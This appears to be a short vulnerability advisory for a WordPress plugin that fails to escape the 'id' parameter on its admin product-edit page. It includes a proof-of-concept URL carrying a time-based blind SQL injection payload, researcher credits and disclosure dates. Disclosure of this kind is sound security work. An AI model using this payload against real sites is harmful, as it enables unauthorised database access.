The plugin does not sanitise and escape the id parameter before using it in a SQL statement when editing a product via the admin dashboard, leading to an SQL Injection
https://example/wp-admin/admin.php?page=fmwes_edit_product&id=1+AND+(SELECT+6037+FROM+(SELECT(SLEEP(5)))Uiuu)
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Daniel Krohmer
Yes
2022-05-09 (about 1 years ago)
2022-05-12 (about 1 years ago)
2022-05-13 (about 1 years ago)